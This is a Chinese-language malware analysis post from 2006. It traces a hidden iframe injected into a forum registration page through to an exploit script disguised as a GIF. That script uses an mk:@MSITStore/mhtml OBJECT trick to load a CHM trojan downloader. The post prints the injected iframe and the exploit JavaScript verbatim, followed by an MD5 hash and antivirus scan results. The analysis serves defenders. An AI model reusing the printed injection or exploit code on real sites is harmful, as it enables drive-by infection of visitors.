endurer 原创
2006-04-08 第1版
网页:hxxp://www.***ai49.com/bbs/reg.asp
有2处被插入了代码:<iframe height=0 width=0 src="hxxp://down.***gament.net/q/f"></iframe>
hxxp://down.***gament.net/q/f的代码为:
<script language="javascript" src="ah.js"></script>
ah.js的代码为:
GIF89a
var GIF89a=document.location.href;GIF89a=GIF89a.substring(0,GIF89a.lastIndexOf('/'));document.write('<OBJECT Width=0 Height=0 style="display:none;" type="text/x-scriptlet" data="mk:%40MSITStore%3Amhtml%3Ac%3A//%2Emht%21'+GIF89a+'%2f1.js::/%23"></OBJECT>');
冒充GIF文件,下载运行1.js。
1.js其实是个CHM文件,会释放/运行.exe文件。Kaspersky报为Trojan-Downloader.Win32.Delf.aet,瑞星报为Trojan.DL.Small.hm。
File: | 1.js |
Status: |
INFECTED/MALWARE
|
MD5 | 617449ed78325096128e604f1e9f9d30 |
Packers detected: |
-
|
Scanner results
|
|
AntiVir |
Found Heuristic/Trojan.Downloader (probable variant)
|
ArcaVir |
Found Trojan.Downloader.Delf.Aet
|
Avast |
Found nothing
|
AVG Antivirus |
Found nothing
|
BitDefender |
Found Trojan.Html.Gamect.A, Trojan.Downloader.Delf.AET
|
ClamAV |
Found Exploit.HTML.ObjCode-2
|
Dr.Web |
Found Exploit.CodeBase, Trojan.DownLoader.6966
|
F-Prot Antivirus |
Found HTML/ObjCode@expl
|
Fortinet |
Found nothing
|
Kaspersky Anti-Virus |
Found Trojan-Downloader.Win32.Delf.aet
|
NOD32 |
Found Win32/TrojanDownloader.Small.AAO, Win32/TrojanDownloader.Delf.AET
|
Norman Virus Control |
Found nothing
|
UNA |
Found nothing
|
VirusBuster |
Found nothing
|
VBA32 |
Found Trojan-Downloader.Win32.Delf.aet
|